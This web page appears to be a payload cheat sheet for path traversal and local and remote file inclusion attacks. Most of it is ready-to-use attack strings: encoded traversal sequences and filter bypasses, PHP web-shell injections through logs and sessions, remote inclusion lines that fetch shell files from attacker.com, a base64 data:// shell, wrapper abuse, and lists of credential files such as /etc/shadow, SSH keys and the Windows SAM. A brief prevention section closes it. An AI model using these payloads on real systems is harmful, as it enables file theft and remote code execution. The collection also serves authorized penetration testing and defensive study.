Skip to content

Path Traversal & LFI/RFI Payloads

Path Traversal (also known as Directory Traversal) allows attackers to access files and directories outside the web root folder. LFI (Local File Inclusion) and RFI (Remote File Inclusion) are related vulnerabilities that allow including local or remote files.

Basic Path Traversal

Linux/Unix

../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../

..%2f
..%2f..%2f
..%2f..%2f..%2f

..%5c
..%5c..%5c

..\
..\..\
..\..\..\

Common Payloads

../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd

..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5cetc%5cpasswd

....//....//....//etc/passwd
..../..../..../etc/passwd

/etc/passwd
/var/www/html/../../../etc/passwd

Encoding Techniques

URL Encoding

%2e%2e%2f
%2e%2e/
..%2f
%2e%2e%5c

%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Double URL Encoding

%252e%252e%252f
%252e%252e%255c

%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

16-Bit Unicode Encoding

%u002e%u002e%u002f
%u002e%u002e%u005c

UTF-8 Unicode Encoding

..%c0%af
..%c1%9c
..%c0%2f
..%c0%5c

..%c0%af..%c0%af..%c0%afetc/passwd

Overlong UTF-8

..%e0%40%ae
..%c0%ae

Null Byte Injection

../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../../etc/passwd%00.png

../../etc/passwd\x00
../../../etc/passwd\0

LFI (Local File Inclusion)

Basic LFI

index.php?page=../../../etc/passwd
index.php?file=../../../../../../etc/passwd
index.php?inc=../../../../var/log/apache2/access.log

Bypassing Filters

# If extension is appended (.php)
?page=../../../etc/passwd%00
?page=../../../etc/passwd\0

# If prefix/suffix is added
?page=....//....//....//etc/passwd
?page=..././..././..././etc/passwd

# Filter bypass
?page=....\/....\/....\/etc/passwd
?page=/etc/passwd
?page=/var/www/../../etc/passwd

Log Poisoning

# Apache/Nginx access log
?page=../../../var/log/apache2/access.log
?page=../../../var/log/nginx/access.log

# Inject PHP code in User-Agent or other headers
User-Agent: <?php system($_GET['cmd']); ?>

# SSH log poisoning
?page=../../../var/log/auth.log
# SSH login: ssh '<?php system($_GET["cmd"]); ?>'@target

Session File Inclusion

# PHP session files
?page=../../../var/lib/php/sessions/sess_[PHPSESSID]
?page=/tmp/sess_[PHPSESSID]

# Poison session variable
$_SESSION['username'] = '<?php system($_GET["cmd"]); ?>'

Proc Filesystem (Linux)

?page=../../../proc/self/environ
?page=../../../proc/self/cmdline
?page=../../../proc/self/stat
?page=/proc/self/fd/[0-255]
?page=/proc/self/mem

RFI (Remote File Inclusion)

Basic RFI

?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.php
?page=//attacker.com/shell.txt
?page=https://attacker.com/shell.txt

Bypassing Restrictions

# If .php is appended
?page=http://attacker.com/shell.txt%00
?page=http://attacker.com/shell.txt?
?page=http://attacker.com/shell.txt%23

# Using different protocols
?page=ftp://attacker.com/shell.txt
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

PHP Wrappers

php://filter

# Base64 encode file content
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
php://filter/convert.base64-encode/resource=config.php

# Read file directly
php://filter/resource=index.php

php://input

# POST data execution
?page=php://input
# POST body: <?php system($_GET['cmd']); ?>

php://data

# Execute code
?page=data://text/plain,<?php system($_GET['cmd']); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

# base64 encoded: <?php system($_GET['cmd']); ?>

expect://

# Requires expect:// wrapper to be enabled
?page=expect://whoami
?page=expect://id
?page=expect://ls

zip://

# Upload ZIP file with shell.php
?page=zip://uploads/file.zip%23shell
?page=zip://uploads/file.jpg%23shell.php

phar://

?page=phar://uploads/file.jpg/shell.php
?page=phar://./uploads/file.zip/shell.php

Platform-Specific Files

Linux/Unix Files

/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/mysql/my.cnf
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/root/.bash_history
/home/user/.bash_history
/home/user/.ssh/id_rsa
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/auth.log
/var/log/syslog
/var/www/html/index.php
/var/www/html/config.php
/proc/self/environ
/proc/self/cmdline
/proc/version
/proc/net/tcp
/proc/net/fib_trie

Windows Files

C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM
C:\Windows\repair\SECURITY
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\SYSTEM
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\inetpub\wwwroot\web.config
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\bin\my.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Users\Administrator\Desktop\
C:\Users\Administrator\Documents\

Web Application Files

# Configuration files
config.php
config.ini
database.php
db.php
settings.php
wp-config.php
configuration.php

# Backup files
index.php.bak
config.php.backup
config.php~
.htaccess.bak

Advanced Techniques

Null Byte Bypass

?file=../../../etc/passwd%00
?file=../../../etc/passwd\x00
?file=../../../etc/passwd%00.jpg

Path Truncation

# Exploit max path length (4096 on Linux)
?file=../../../etc/passwd/./././././[repeat many times]

Dot Segment Bypass

?file=..%2f..%2f..%2fetc/passwd
?file=..%5c..%5c..%5cetc/passwd
?file=....//....//....//etc/passwd
?file=..;/..;/..;/etc/passwd

Filter Bypass

# If ../ is removed
....//....//....//etc/passwd
..../..../..../etc/passwd
..\\..\\..\\/etc/passwd

# If / is blacklisted
..\..\..\etc\passwd

Prevention Best Practices

  1. Input Validation: Validate and sanitize all file paths
  2. Whitelist Allowed Files: Only allow access to specific files
  3. Use Basename: Extract filename without path: basename($_GET['file'])
  4. Check Realpath: Resolve symbolic links and verify path
  5. Disable allow_url_include: For PHP, disable in php.ini
  6. Principle of Least Privilege: Run web server with minimal permissions
  7. WAF Rules: Implement rules to detect traversal patterns
  8. Secure File Operations: Use safe file access APIs

PHP Example

// Bad
include($_GET['file']);

// Better
$allowed_files = ['home.php', 'about.php', 'contact.php'];
$file = basename($_GET['file']);
if (in_array($file, $allowed_files)) {
    include($file);
}

Testing Tools

  • dotdotpwn - Path traversal fuzzer
  • Fimap - LFI/RFI scanner
  • Burp Suite - Manual testing
  • OWASP ZAP - Automated scanner
  • Kadimus - LFI/RFI exploitation tool

⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.